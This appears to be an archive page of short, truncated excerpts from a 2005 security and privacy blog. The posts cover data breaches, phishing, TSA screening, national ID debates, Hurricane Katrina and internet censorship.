Over at Infectious Greed, Paul Kedrosky responds to a reader about the “Web 2.0” meme: As much as I love trying the new technology and services, very little has changed in how I use the web. Only RSS aggregation has truly offered me value. Everything else I enjoy trying out and then utterly forget it […]

 

Disaster Planning

Since Katrina, I’ve been trying to spend about $25 a week on disaster preparedness. Fortunately, I already own some basic camping gear, so I’m starting out by storing more food and water. My pantry tends to be thin on food that can be eaten without preparations. I have powerbars and snack bars so I’ve been […]

 

Shmoocon 2006

Today is the last day to get the stunningly low $75 rate for Shmoocon in Washington DC Jan 13-15, 2006. Remember to bow to Bruce’s firewall (largish video download). I understand this years con will culminate in a deathmatch between a new, armed Shmoo robot and the speaker who gets the worst ratings. The speaker […]

 

National Poison A Database Day?

The fine folks at BugMeNot (free registration required) are sponsoring “Internet Advertiser Wakeup Day.” I think it’s a cool, but flawed, idea. If you believe that paying for service is better than kneeling before the advertisers and giving up your privacy, then poisoning the databases is good. However, to be effective, the poisoning needs to […]

 

Harper's Privacy Framework for DHS

Jim Harper writes: At this week’s meeting of the Department of Homeland Security’s Data Privacy and Integrity Advisory Committee, Joanne McNabb, Chief of the California Office of Privacy Protection, and I circulated and presented a draft ‘Framework’ for assessing homeland security programs in terms of their consequences for privacy and related values. Members of the […]

 

Fishermen's Friend, Breathalyzers

It comes after a 24-year-old driver was found to be over the legal drink-drive limit during a routine control in Munich. He was taken to the police station where blood tests found he had no alcohol in his system. The man was released after officers found the strongest thing he had taken was a Fisherman’s […]

 

"Remains Safely Anonymous"

People seem to dig Star Wars posts. I could probably blog for a month on security lessons, illustrated with Star Wars quotes, but I’d need to buy the DVDs and get some video capture technology, and … …ok. You’ve convinced me. Friday Star-Wars-security-lessons-blogging it is. Ben: The “other” he spoke of is your twin sister. […]

 

Bugger Productivity

It’s not like I was getting any work done anyway. (Ok, actually I was: Five of yesterday’s six posts took under 10 minutes, and four took 5 minutes or less.) But: Scientists invade the privacy of Giant squid, intruding on their long-preserved solitude. Also be sure to notice National Geographic’s beautiful user interface for selecting […]

 

University of Georgia, 2400 SSNs, Hacker

ATHENS – A hacker broke into a computer database at the University of Georgia, gaining access to the Social Security numbers of employees in the College of Agricultural and Environmental Sciences and people who are paid from that department. More than 2,400 numbers, belonging to roughly 1,600 people, may have been exposed, UGA spokesman Tom […]

 

FinCEN Effectiveness

At the Counter-Terror blog, Andrew Cochran writes: “Treasury Department’s FinCEN Unit Recovering From “Cyberjacked” E-Mail System:” The most important impact of the cyberjacking has been to shut down the automated system whereby FinCEN and law enforcement request and receive information from financial institutions for use in terrorism and money laundering cases. The system, enacted under […]

 

What About My Needs?

While everyone (FCC, FBI, RIAA) is lining up to decide what software you can run, I’d just like to ask that I be included in the list. The Federal Communications Commission thinks you have the right to use software on your computer only if the FBI approves. No, really. In an obscure “policy” document released […]

 

RBC Dain Rauscher, 300,000 SSNs, Disgruntled former employee

The FBI has opened an investigation into the possible theft of personal information about some clients of RBC Dain Rauscher Inc. The chief executive of the Minneapolis-based brokerage firm disclosed the problem in a letter sent to 300,000 households. Dain Rauscher has not yet detected any fraudulent activity in their accounts, according to the letter […]

 

CUNY, Hundreds of SSNs, Exposed Files

The CUNY foul-up that put students’ personal information a Google search away from identity thieves was more widespread than first reported, with school officials saying yesterday that the Social Security numbers of hundreds of employees also got on the Web. City University of New York officials detected the unprotected payroll link for Hunter College Campus […]

 

New Ten Dollar Bills

The US has unveiled new ten dollar bills, and, unsurprisingly, they contain Constellation EUrion in an entertaining spot: That’s right. Big Alexander Hamilton is watching you. Close up from Money Factory.com.

 

More On Cardsystems Lawsuit

Joris Evers continues to report well on the Cardsystems lawsuit, this time in “Judge looks for links in credit card case:” Kramer said he wants to be clear on which defendants fall under California civil code section 1798.82, the notification statute. While it is clear that the breach was at CardSystems, the law applies to […]

 

Google VPN, Macs, and Privacy

NudeCybot (hey, you’re blogging again!) asked me for opinions on Google Secure Access (or just GSA), and sent me a link to Kevin Stock’s Google Secure Access on Mac OS X. There’s a lot of critiques of Google’s Privacy policy around GSA: “Hide what you’re doing from everyone but us! And, umm, anyone who asks […]

 

North Fork Bank, 9000 mortgageholders (Not SSNs), stolen laptop

Data relating to about 9,000 mortgages that were originated by Countrywide Home Loans but sold to North Fork were in the laptop, according to a letter received by a customer on Thursday. The laptop was one of several stolen over the July 24 weekend, the letter said without identifying the office. The data included the […]

 

What Is Phishing

In conversation with a friend, I realized that my essay, “Preserving the Internet Channel Against Phishers” didn’t actually explain the problem. I made the assumption that everyone had the same perception of what it was. (Why didn’t anyone point that out?) So I’ve added the following (after the break), and I think the resultant essay […]

 

A Life, Observed

A blogger who I’d recently discovered has retired: I’ve always had my two lives separated – my offline world and my online one. That’s the way I wanted it and that’s the way I set it up and I’ve got my own reasons for it. And someone decided to ruin all the fun and be […]

 

Sweet Land of Databases

In “Stuck on the No-Fly List,” Ryan Singel discusses the procedure for, no not getting off the list [1], but for getting onto yet another “cleared” list.[2] Confused? I was too. The head of the Terrorist Screening Center [3] told me recently that I’d mixed up “No-Fly” and “Selectee.” As Daniel Solove explains in “Secure […]

 

Cardsystems Breach and Notice

On Friday, San Francisco judge Richard Kramer ruled against the idea that Cardsystems (or Visa or Mastercard) had to provide 1386 notice to people. Some articles are “Visa, MasterCard Win Battle Over Breach” and “Credit card companies can keep data ID theft secret.” But the article worth reading is CNet’s “Judge holds off disclosure in […]

 

Never Enough

After the 7/7 London bombings, France decided it was not enough. So, even though France has already one of the toughest anti-terrorism judicial arsenal in Europe, it is adding to it. Indeed, French newspaper Le Monde just revealed the clauses of the new anti-terrorist law due to be formally presented to the government on October […]

 

Judging Wines By Their Labels

Stefan Geens has an entertaining post about “how to judge a wine by its label:” Therein lies the secret as to why you really can judge wine by its label: Companies where the management has an atrocious taste in labels tend to be the old-school type, uncertain about innovation, parochial about marketing and under the […]

 

More Toys: Suicide Bomber Barbie

Yes, its suicide bomber Barbie! Click the picture for a few more views. Toy supplier Shuki Toys, responsible for the distribution of the stickers, said in response, “We were very surprised to see the stickers in the shop, the several sheets of stickers have been pulled of the shelves.” “We check all the stickers, thousands […]

 

Apple Security Update 2005-08

There’s a new security update from Apple, for both 10.3.9 and 10.4.2. If you browse the internet, or read email, you need it. I’m getting really annoyed at Apple’s update mechanisms. Not only the agreeing to a new license as part of the update, but the awful way in which they’re arranged. The technical data […]

 

Chinese Censorship

Rebecca MacKinnon has the story on how AOL is refusing to collaborate on blocking freedom in China, in “Internet Censorship & Corporate Choices.” Companies do have a choice, and the choices they make matter a great deal. Security technologies that help protect people from their governments are not yet internationalized and easy to use. So […]

 

Real ID, Real Unfunded Mandate, Real Unnecessary

It seems to be standard that major new government programs cost more than we expect. Federal Computer Week has a story, “Real ID costs rising:” Earlier this year, Congressional Budget Office officials said nationwide implementation of the Real ID Act would cost $100 million in five years. The act requires minimum national standards and physical […]

 

Security Implications of Economics of ID Cards

Some of the precepts that proponents of national ID often put forth is that it can make “illegal immigration more unpleasant for immigrants,” or “a national ID system has some substantial potential to be the cornerstone of a national fraud-prevention system.” These are attractive notions, but will not be borne out in reality. Actually, the […]

 

"Every Valid Vote?"

Kip Esquire continues his coverage in “ACLU Sues to Block Georgia Voter ID Law,” and closes, like he did a comment on my last post on the subject: Always remember, it’s not about “making every vote count,” but rather “making every valid vote count.” I don’t think this works as a requirements statement. First, it […]

 

Small Bits on Security

“Security cameras certainly aren’t useless. I just don’t think they’re worth it.” So comments Bruce Schneier on the news that “Cameras Catch Dry Run of 7/7 London Terrorists.” Richard Beitjich comments on “Citadel Offers Product Security Warranty.” I think Richard nails it with his analysis that “There are probably enough loopholes through which one could […]

 
 

Thoughts on Chapell's View

Alan Chapell has some interesting thoughts in “CONSUMER WATCH: Localities put private data in harm’s way:” As an aside, some might argue that there’s little distinction between “evil doer” and “data broker”. I prefer to view the latter as the poster children for another unregulated industry that is screaming for the Government to step in. […]

 

2005 MacArthur Fellows Announced

I always find it fascinating to see who the foundation chooses to honor and support. The list of 2005 Winners is worth reading. Hey! No, really! Even if this is a short post, go click the link. Hmm, I should add a picture or something.

 

Palo Alto Children's Health Council, 6,700 SSNs, Thief

A backup tape containing the names, Social Security numbers and detailed health information of as many as 6,000 current and former clients of the Children’s Health Council was stolen from the nonprofit agency’s offices, officials confirmed Sunday. From SignonSandiego, “Thousands of health records stolen from Palo Alto agency.” via Cotse Privacy Watch. The Children’s Health […]

 
 

Investigating New Orleans Failures

In “Bush Aide Will Lead Hurricane Inquiry,” the New York Times chronicles the sort of petty bickering we’ve come to expect from kindergarteners America’s leadership. Today’s subject-of-bickering is who is to investigate the failures in New Orleans: On Capitol Hill, Congressional Republicans continued their efforts Monday to persuade Democrats to take part in a special […]

 

Yahoo & China

Yahoo! co-founder Jerry Yang said the company was merely following Chinese law – it had no choice. But as human rights groups have been pointing out, Yahoo! has been going above and beyond the strict legal requirements for some time. In 2002 it signed the Internet Society of China’s Public Pledge on Self-Discipline for the […]

 

Voter ID Cards

Kip Esquire, who I enjoy reading, writes: The voter ID proposal, already causing a stir in Georgia, is a reasonable compromise. ID cards help deter voter fraud, yet if the cards are free, then the “poll tax” histrionics evaporate (see, e.g., my previous post). I agree that some histrionics may go away, but the real […]

 

Parental Privacy

My first reaction was shock, then anger. Why did the baby formula company have her due date? I had shared our baby’s due date with only two businesses: my health insurance company and a Web site for expectant and new parents. When I registered to enter the Web site, I specifically requested that it not […]

 

Command-Q Getting Me Down

The Mac’s Terminal.app is way too easy to quit; it seems to absorb any command-Q typed near it, even if the menubar is showing you that you’re in another app. (This may be an interaction with the preference FocusFollowsMouse.) Anyway, having just lost a bunch of terminals with useful data in them, I went and […]

 
 

Miami University of Ohio, 21,762 SSNs, Staff

Miami University is notifying all students who attended Miami during the fall 2002 semester that a report containing their names, Social Security numbers and grades had been inadvertently placed in a file accessible through the Internet. University officials said that at this point they have no evidence of illegal use of the information, which included […]

 

"Iran's Nuclear Ambitions" Pitch

Earlier, I mentioned the Powerpoint deck being used to pitch the idea of Iran’s Nuclear ambitions. Now, courtesy of Edward Tufte’s forums, we have links to the presentation (PDF). This is mentioned in “U.S. Deploys Slide Show to Press Case Against Iran ” in the Washington Post. The presentation is a nearly classic example of […]

 

Small Bits on Usability

Thomas Barnett comments that “The U.S. is pushing a secret PowerPoint briefing to allies on Iran, trying to convince them that the WMD question is drawing to a head there.” Maybe they’ve read “The Cognitive Style of Powerpoint,” and would prefer data to being pitched? I’ll (ahem) pitch my lesser-known Hamlet in Powerpoint. Jacob Nielsen […]

 

Security Bloggers Spit-Polish DHS

Or maybe just spit on them, and then rub it in. Not Bad For a Cubicle has “http://thurston.halfcat.org/blog/?p=243Don’t Plan on It: From what I can tell, the best way to keep a building from catching fire would be put these clowns in charge of burning it down. They truly are The Gang That Couldn’t Shoot […]

 
 

Musings After the Dali Museum

I took a little time away from the conference to visit the Salvador Dali Museum in St. Petersburg, Fl. It’s an impressive museum, and worth seeing. One of the strongest impressions I got from the experience was that of Dali’s sheer technical skill. From paintings that he made as a child (as young as 9), […]

 

Roberts on the Right to Privacy

The term “right to privacy” has, in the debate over the Supreme Court, become a code-word for a woman’s right to abortion (or more specifically, to a liberty to choose without government interference.) As someone who believes that privacy is broader than that, I was very pleased to see that Roberts said: “Senator, I do. […]

 

More on Preserving the Internet Channel Against Phishers

A new survey is reported in “Privacy and Security Concerns Flatten Interest in Online Banking” (Government Technology): After years of dramatic growth in online banking penetration, the percentage of Americans who conduct personal banking activities online remained unchanged during the 12-month period ending August 2005. According to results from a new survey of 1,000 American […]

 

Soldier Readiness Processing Center, "1000s" of SSNs, Thieves

COLORADO SPRINGS – Fort Carson has cautioned thousands of its soldiers to watch their credit records carefully following the theft of computerized personnel records from the post. Thieves broke into the Soldier Readiness Processing center over the weekend of Aug. 20-21 and stole four computer hard drives containing thousands of personnel records, Fort Carson spokeswoman […]

 

Skype, EBay, and Communications Privacy

EBay has bought Skype, for reasons that I don’t quite understand. Perhaps all that cash was burning holes in their pockets. The BBC reports: “Communications is at the heart of e-commerce and community,” said eBay chief executive Meg Whitman. “By combining the two leading e-commerce franchises, eBay and PayPal, with the leader in internet voice […]

 

"Protecting Society By Protecting Information"

Today, I’m at the National Institute of Justice’s National Conference on Science, Technology, and the Law, and am participating in a panel on “Balancing Information Sharing and Privacy.” I’ll present “Protecting Society By Protecting Information: Reducing Crime by Better Information Sharing” (Or get the powerpoint slides. I don’t know why Powerpoint makes all the speaker […]

 

Director, Malicious Code and Malware

My friend and former boss at Radialpoint is looking for a malicious code and malware expert: The Director of Malicious Code and Malware will be responsible for being the leading authority on the security and protection of more than 14 million broadband subscribers, the largest community of broadband subscribers in the world. This high profile, […]

 

On RSS Security

I’ve been mystified for a while by people talking about a need for RSS security products, as if those were somewhat different than other HTTP security products. Apparently, I wasn’t alone in this, Greg Reinacker, CTO of Feedburner Newsgator writes: I was on a call the other day with some folks in the industry, and […]

 

Some Good News From New Orleans

John Quarterman tells of airlines sending planes to New Orleans without contracts or guarantee of payment. And the New Orleans Times Picayune tells stories of those who stayed to man the pumps in “Pace of drainage is rare bright spot.” Incidentally, while I hate ads, the work done by the staff of the Times Picayune […]

 

"Taking Stock of the Forever War"

The New York Times Magazine has a long (14 screen) article, “Taking Stock of the Forever War,” reflecting on the four years since the attacks on New York and Washington. It seems fairly even-handed overall: any article that long will have points people contest. I’m in full agreement with the general thesis, that the United […]

 

Special Administrative Improvement District?

An article in the BBC, “Uniform row rocks HK Disneyland” has great quotes from Chinese officials: Financial Secretary Henry Tang said: “We welcome Disney to come to Hong Kong to invest in Disneyland, but in the process of building Disneyland, no-one has special rights. Everyone is equal before the law.” An editorial in the Ming […]

 

A Cry for Help

…I have determined that this incident is of such severity and magnitude that effective response is beyond the capabilities of [Louisiana] and affected local governments, and that supplementary Federal assistance is necessary to save lives, protect property, public health, and safety, or to lessen or avert the threat of a disaster. I am specifically requesting […]

 

Can You Hear Me Now?

Ed Felten reports on a new technique to turn go from a recording of typing to the sequence of keystrokes: Li Zhuang, Feng Zhou, and Doug Tygar have an interesting new paper showing that if you have an audio recording of somebody typing on an ordinary computer keyboard for fifteen minutes or so, you can […]

 

Small Bits: Clearance, Security Legislation, Schneier Pointers, Get Me An Operator

Richard Bejtlich comments on a Federal Computer Week article, “Security clearance delays still a problem” in “Feds Hurry, Slow Down.” “ITAA officials said 27 member companies that responded to a survey are coping with the backlog by hiring cleared employees from one another, sometimes paying premiums of up to 25 percent.” I’m glad to see […]

 

Tor GUI Contest Update

I’m very excited to say we’ve added two more outstanding judges to the Tor GUI contest: Edward Tufte and Bruce Schneier. I’m honored and excited to be working with both. As a reminder, you have at least until October 31 for submissions, and all qualifying entrants will receive a t-shirt.

 

More on Bureaucracy

This is a follow-on to “Who Will Rid Me of This Meddlesome Bureaucracy?” and the same disclaimers apply. I’ll note that Time Magazine has an article “How Reliable Is Brown’s Resume:” The White House press release from 2001 stated that Brown worked for the city of Edmond, Okla., from 1975 to 1978 “overseeing the emergency […]

 

Capture The Flag Too Boring?

Max Dornsief complains that “Capture the Flag is getting somewhat boring.” That’s too bad, so with all due haste, here are some suggestions: Capture the Business: …is a slight variation on the Ghetto Hackers game. The Ghetto hackers were all about simulating a real business, with its need for uptime. In capture the business, teams […]

 

More on Opera

It has a lot to recommend it, but there are a number of niggling annoyances: Saved pages are poorly named. (Safari gives the page a name based on its title; Opera uses the filename, often “index.html.”) Since I save a lot of web pages, this is an issue. Cookie management doesn’t seem as good as […]

 

What's Wrong With Fingerprints?

It’s not a question you’ll hear me ask often, but when PrestoVivace sends me a link to “DOD plans to recognize more than just fingerprints:” “We’re looking for new technologies, innovators and companies that recognize that the biometrics enterprise in the Defense Department and the U.S. government in five years is going to be very […]

 

Journalist Shi Tao Jailed For 10 Years, after Yahoo! Helped

Both T-Salon and RConversation are reporting a Reporters Without Borders story, “Information supplied by Yahoo ! helped journalist Shi Tao get 10 years in prison:” The text of the verdict in the case of journalist Shi Tao – sentenced in April to 10 years in prison for “divulging state secrets abroad” – shows that Yahoo […]

 

Who Will Rid Me of This Meddlesome Bureaucracy?

One of the facets of the response to and analysis of Katrina is that the disaster is large enough that everyone can choose an aspect of it to look at from the comfortable heights of their favorite hobby-horse. Be it the incompetence of (state, federal, or local) government, the evils of (small or big) government, […]

 

Bring Back The 9/11 Commission

As historians, they did a fantastic job of gathering information. They have credibility and stature. They have the perspective to tie the destruction of New Orleans to the destruction in New York, Washington, and Pennsylvania, and to consider the failures of leadership and the failures of response in the context of massive new spending to […]

 

New Orleans Roundup

Michael Froomkin points to a claim that “Long before FEMA dropped the ball, local authorities decided they didn’t need one: See See LENIN’S TOMB: Everything has gone according to plan.” For more, the City of New Orleans web site is still operational, and has a section on Emergency Preparedness. Bruce Sterling, with only a small […]

 

Katrina Roundup

Suzette Haden Elgin has an interesting essay on the “biblical proportions” construct, and its meaning. Thomas Barnett has written “The art of the long view,” which is an interesting perspective to be able to maintain right now. Another useful perspective comes from Bill west at the Counterterrorism blog in “Katrina Response – Another Quick Observation,” […]

 

New Orleans Times-Picayune Open Letter To The President.

…Every official at the Federal Emergency Management Agency should be fired, Director Michael Brown especially. In a nationally televised interview Thursday night, he said his agency hadn’t known until that day that thousands of storm victims were stranded at the Ernest N. Morial Convention Center. He gave another nationally televised interview the next morning and […]

 

Bush Fires Cherntoff

(CNN reports🙂 President Bush told reporters on Friday that millions of tons of food and water are on the way to the people stranded in the wake of Hurricane Katrina — but he said the results of the relief effort “are not acceptable.” He then went on to fire DHS Secretary Cherntoff. I’m such a […]

 

Asif Siddiqui Update

In May, I blogged “Georgia DMV, employee Asif Siddiqui, “hundreds of thousands.”” An anonymous tipster sent me a link to “Unemployment Appeal Decision:” The following is the decision of Appeals Tribunal of Georgia Department of Labor ruling that Asif Siddiqui is entitled to unemployment benefits as employer Georgia Technology Authority failed to prove their allegations. […]

 

Some Good News from New Orleans

It seems that both the French Quarter may have survived, and Fats Domino definitely has, despite earlier reports he was missing. It also seems that the National Guard is finally getting food to some people, and evacuating others, although there’s a lot more to do. Oh, and just when I try to get in a […]

 

Katarina, Looking Longer Term

There’s a very long post on the public health implications of Katrina at Dave Farber’s IP list, “Hurricane Katrina Analysis – CFR Global Health Program.” I hope that we respond better to these threats than we have to the hurricane. Thomas Barnett takes a look at the long term effects of “Katrina’s System Pertubation.” (I […]

 

New Orleans Roundup

There’s a lot of amazing things being written out there. One of the more fascinating would be Interdictor’s LiveJournal. He’s keeping a New Orleans ISP running, and blogging as he and his co-workers do. He asks that we link with mgno.com, but that’s been intermittent. Use Livejournal as a backup. Michael Froomkin has a roundup, […]

 

"This is Our Tsunami"

Before I get into this post, I’d like to say I have a great deal of sympathy for the individuals whose lives, but nothing else, have been saved. However, I find the comparisons to the Indian ocean tsunami to be irresponsible and wrong. Sample quote: Biloxi Mayor A.J. Holloway said the storm’s damage was overwhelming, […]

 

Four Alleged Terrorist Plotters Indicted in LA

The head of a radical Islamic prison gang and three others were “on the verge” of carrying out attacks against U.S. military sites, synagogues or other Los Angeles-area targets when police foiled the alleged plot, prosecutors said. From “Four indicted in alleged terrorist plot against LA-area targets.” The Counterterror blog has some analysis and links […]

 

Disaster Preparedness

Researchers from the non-profit Rand Corp. looked at the ability of local agencies to meet federal standards for responding to urgent-case reports of infectious diseases like bubonic plague, anthrax or botulism. Of 19 local public health agencies called in 18 states, only two met the U.S. Centers for Disease Control and Prevention’s standards, which include […]

 

New Orleans is Not a Morality Play

Enter narrator I pray you all give your audience, And here this matter with reverence, By figure a moral play- The Flooding of New Orleans called it is, That of our lives and ending shows How transitory we be all day. Enter preacher, sturm and drang… It has nothing to do with Southern Decadence, despite […]

 

"The Offending Articles Will Be Disposed Of"

Our Saudi allies, displaying their tolerance: Paper cups with Hebrew writing disturbed both employees and medical staff at King Khaled National Guard Hospital on Saturday. The catering subcontractor for the hospital coffee shops began using them on Saturday after their usual supply ran out. “We were shocked and angry,” said an employee. “How can Israeli […]

 

The Gulf Coast

The scale of destruction from Katrina is simply staggering. The Red Cross, and other good organizations could use your help. I do wonder if Pompeii isn’t a better analogy than others being brought up, such as the Indian Ocean Tsunami or Hiroshima. As an aside, I expect there will be fake charity sites set up, […]

 

Impressions of Opera

Having taken advantage of Opera’s offer (still valid for a few hours!) I must say, I’m impressed. Opera is snappy in a way that Safari (with all the plugins I’ve added) is not. There’s some small bits of things not working as I expect, things that should be controlled differently*, as I move, but there […]

 

Happy Birthday Opera

The Opera browser, which some friends rave about, is now ten years old! To celebrate, they’re offering free full copies if you send a note to “registerme@opera.com before midnight tonight. The registered copies do not have the ad bar. Woot!

 

ParadisePoker.com Blackjack Cracked

An article in the summer 2005 issue of 2600 magazine (“The Hacker Quarterly”) discusses a timing attack on the Paradise Poker Blackjack game. In essence, the game reveals when the dealer’s hole card is a 10, because it takes longer to process that situation. (The article isn’t online, near as I can tell.) There’s more […]

 

Companies Helping Phishers

Daniel Solove has a good post on “How Companies Help Phishers and Fraudsters.” Companies have trouble being consistent in what they send, and that’s to the advantage of fraudsters. They also have a hard time taking security information from outsiders, however well meaning. I had an experience with Citi Mastercard. After some problems, I was […]

 

Colossus, Anon Blogging, and International Blogging

In PGP’s CTO Corner, Jon Callas draws attention to the second world war Colossus computer: The Colossus Rebuild Project took 10 years and 6,000 hours of effort. The resulting machine is not a replica of a Colossus, but an actual Colossus that uses some of the actual parts. The team finished a Mark II Colossus […]

 

Oxford No Longer Accepting "Child Prodigies"

Yinan Wang, the 14-year-old Chinese boy who clinched a place at Oxford University last week, will be the last child prodigy to study there under reforms being considered by admissions tutors. Despite an almost perennial flurry of headlines on children barely in their teens being offered places, the university is considering an unprecedented blanket rule […]

 

Cease and Desist, or I Shall Embarrass Myself Some More!

It used to be that to mock lawyers sending cease and desist letters, you had to be elite Swedish file traders. (Or Phrack. Phrack used to mock their correspondants, too, before they got all corporate.) But now, even gadget blogs can play, and play Gizmodo does, when some bunch of lawyers sends them a letter […]

 

Homeland Security Blanket

By Amy Franceschini. See the complete work at Future Farmers.   It’s not new, but Gizmodo picked it up and reminded us.

 

ChartOne, 3,851 SSNs+Medical Records, System Administrator

On Aug. 1, UF was notified that a computer was stolen from ChartOne, a Boston-based firm that the Health Science Center contracts with to help manage medical records. In the laptop’s database were the names, Social Security numbers, dates of birth and medical record numbers for more than 3,000 patients spread over a wide area. […]

 

Enforcement and Incentives

In “Getting Serious about Smog,” Virginia Postrel writes: After many years of bureaucratic resistance, California is finally getting serious about air pollution from cars. These days, most cars don’t spew much pollution. But the few that do, account for a lot, and many of them still manage to pass state inspection. Now, the LAT reports, […]

 

WiKID Goes Open Source

WiKID is a two-factor authentication system. It consists of: a PIN, stored in the user’s head; a small, lightweight client that encapsulates the private/public keys; and a server that stores the public keys of the client’s and the user’s PIN. When the user wants to login to a service, they start the client and enter […]

 

"Preserving the Internet Channel Against Phishers"

I’ve updated the concepts first presented in “Don’t Use Email Like a Stupid Person” and “More on Using Email Like A Stupid Person,” to make them more palatable to readers. The new short essay is “Preserving the Internet Channel Against Phishers,” and is designed to be shared with marketing folks without insulting them. Alternate title: […]

 

Speaking of Hot Knives, Butter

It seems that Zylon “bulletproof” vests are not nearly as effective as Kevlar ones, and the Justice department may pull funding for purchasing them. (All the press releases and reports are at the DOJ site.) They are, however, more effective than not wearing a vest. I am routinely outraged here by poor technology decisions that […]

 

Robertson Lies In Apology

The dominant headline around Robertson’s attempt to retract his comments is that he “apologized.” That is false. He claimed to have not called for an assassination: “I said our special forces could take him out. Take him out could be a number of things including kidnapping.” Mark, at Cutting Edge of Ecstasy takes out goes […]

 

Small Bits: Alex Haislip, Chinese Censorship, TSA Xrays

Alex Haislip is blogging up a storm at VC Action. I love journalist bloggers; there’s so much interesting backstory that they talk about. And working at Red Herring, Alex has more dirt than he could dish and stay in business. 😉 Curt Hopkins points to a fascinating story about the folks who run the great […]

 

No Child Left Untagged

CSO’s Security Feed has a story “RFID Technology Prevents Infant Abduction.” The story reads like a press release: VeriChip Corporation, a subsidiary of Applied Digital (ADSX), a provider of security and identification technology, stated that its “Hugs” RFID infant protection system prevented the abduction of a baby at Presbyterian Hospital in Charlotte, North Carolina. A […]

 

From the "Who Will Rid Me Of This Meddlesome Priest" Department…

Television evangelist Pat Robertson told viewers the U.S. should kill Venezuelan President Hugo Chavez to prevent the Latin American country from becoming a “launching pad” for extremism, the Associated Press said. From Bloomberg. Ezra Klein has comments in It Was The Christian Thing To Do. Apparently, Venezuela is upset. Thanks to Nick for distracting me […]

 

Caption Contest

I took this picture of a sign, lying on its side, near gate A12 of the Atlanta airport on August 16th, 2005. The photo is what I saw; it has not been retouched. It needs a caption, and I am simply flabbergasted.                

 

Released!

Captchas are those annoying, spamatuer “type this so we can stop spam” things that you see on some blogs. PWNtcha stands for “Pretend We’re Not a Turing Computer but a Human Antagonist”, as well as PWN capTCHAs. This project’s goal is to demonstrate the inefficiency of many captcha implementations. For an overview on why visual […]

 

Blogroll Rolls On

I’ve deleted Geoff’s ScreenDiscussion for negligent posting, and added Mario’s blog, Ed and Diana at Security Curve and TQBF and his service-oriented chargen 19/udp.

 

"FBI: Businesses (Still) Reluctant To Report Cyber Attacks"

Volubis picks up stories in Information Week and Computer World: Roughly 20% of businesses report computer intrusions annually, a figure the agency believes is low. Director Robert Mueller urged businesses to step forward, promising greater sensitivity from the FBI in return. This reluctance has become especially important at a time when identity theft is growing […]

 

Demand Your Records

In her “On the Record” blog, Ann Harrison (Hi Ann!) covers how to use the privacy act to request the records TSA collected, illegally, on millions of innocent people. Incidentally, Arthur Anderson was shut down for destroying data like this.

 

US Air Force Hack and TSA

I just blogged about a breach of data which could be used for ID theft in “US Air Force, 33,000 SSNs, Hacker.” I’d like to tie that to a story I mentioned earlier this week, “TSA May Loosen Ban on Razorblades, Knives:” The Aug. 5 memo recommends reducing patdowns by giving screeners the discretion not […]

 

US Air Force, 33,000 SSNs, Hacker

In : Half of USAF’s officers’ PII stolen, Chris points to stories about “AFPC notifies Airmen of criminal activity exposing personal info,” and “Air Force investigates data breach.” AMS, an online program used for assignment preferences and career management, contains career information on officers and enlisted members as well as some personal information like birth […]

 

"Its Precious Patents Disclosed"

In Lee Kuan Yew is usually worth reading, Tyler Cowen discusses a Lee Kuan Yew interview, where Lee mentions ‘intellectual property’ law as a place Singapore can stay ahead of its competitors. Mr Lee says: Such as where the rule of law, intellectual property and security of production systems are required, because for them to […]

 

No Child Left Alone

The EFF is directing attention to the Leave My Child Alone! colalition. Did you know that President Bush’s No Child Left Behind Act mandates that public high schools turn over private student contact information to local military recruiters or risk losing federal education funding? Not only that, but the Pentagon has compiled a database of […]

 

TSA to Look Through Your Clothes

[Update: Welcome Buzzflash readers! If you enjoy this post, please have a look around, you might enjoy the air travel or privacy category archives.] USA Today reports “TSA hopes modifications make X-ray not so X-rated.” The TSA now hopes to test modified “backscatter” machines in a few airports this fall that will solve the privacy […]

 

I'm a Spamateur

In private email to Justin “SpamAssassin” Mason, I commented about blog spam and “how to fix it,” then realized that my comments were really dumb. In realizing my stupidity, I termed the word “spamateur,” which is henceforth defined as someone inexperienced enough to think that any simple solution has a hope of fixing the problem.

 

Tor GUI Contest

The announcement says: Tor is a decentralized network of computers on the Internet that increases privacy in Web browsing, instant messaging, and other applications. We estimate there are some 50,000 Tor users currently, routing their traffic through about 250 volunteer Tor servers on five continents. However, Tor’s current user interface approach — running as a […]

 

300,000 words and counting

It’s my one year blogiversary. In that time, about 300,000 words including comments and trackbacks have been posted in 957 articles. That’s a little over 2.6 articles a day, some of which some of you seem to have enjoyed reading. Moveable type added about 40,000 words of html tags, colon tagged junk etc. So, really, […]

 

Avoid Parkhill's Waterfront Grill in Allenhurst, NJ

Two diners on a date at a fancy Jersey Shore restaurant were furious when they saw the check — which listed their table as that of the “Jew Couple.” … Stein said he took the offensive bill and showed it to Jewish friends seated nearby who said they could not believe it. When the group […]

 

Your Questionable Content (redux)

Thanks for your patience, I think we’ve solved the problem. Some comments may be moderated, but the rejection should be done. Please email if there’s any more rejections.

 

TSA Sued by Real Americans

A group of Alaskans have gotten tired of being jerked around by TSA and filed suit in the US District Court in Anchorage. Read the story at TSA Secrecy Must Stop.

 

Where's the Evidence?

Tom Ptacek offers up unsubstantiated rumors, and Lindstrom caves? Shoot. I did my chrooting DNS work when a customer’s DNS servers came under attack. Can I get beer without naming the customer? I thought Pete was demanding full details. None of the attacks I saw used are less than five years old. More seriously, I […]

 

TSA Roundup

Allow me to begin by shocking my regular readers with a few words of praise for TSA: Ryan Singel reports that they found a bomb, in “ Screeners ID IED .” Of course, that’s 1 bomb:1,000,000 nail clippers, but still. It’s good to see that they can find the bombs. When they’re not harassing babies […]

 

Your Questionable Content

A couple of people have mentioned that something in the comment posting code is rejecting their comments for “questionable content.” I’m very sorry, and am working with my fine technical support staff to try to solve it. If this happens to you, please email me: emergentchaos & gmail & com, and I’ll try to post […]

 

The Malaysia Option

Sunday’s Washington Post has a story, “U.S. Lowers Sights On What Can Be Achieved in Iraq:” The Bush administration is significantly lowering expectations of what can be achieved in Iraq, recognizing that the United States will have to settle for far less progress than originally envisioned during the transition due to end in four months, […]

 

The Death of Jean Charles de Menezes

Remember that bulky jacket-wearing, fare-skipping young foreigner who taught the world that it’s a bad idea to act suspiciously near public transportation after a terrorist attack? The UK’s Observer investigates, and among other things finds: Initial claims that de Menezes was targeted because he was wearing a bulky coat, refused to stop when challenged and […]

 

More on Using Email Like a Stupid Person

[Update: A less in-your-face version is Preserving the Internet Channel Against Phishers.] There have been lots of good comments, both here and over at Nielsen Hayden’s Making Light. There’s a few points left dangling that I wanted to respond to further. Those are the “ignore the marketing department” view and the “train the customer view.” […]

 

Don't Use Email Like a Stupid Person

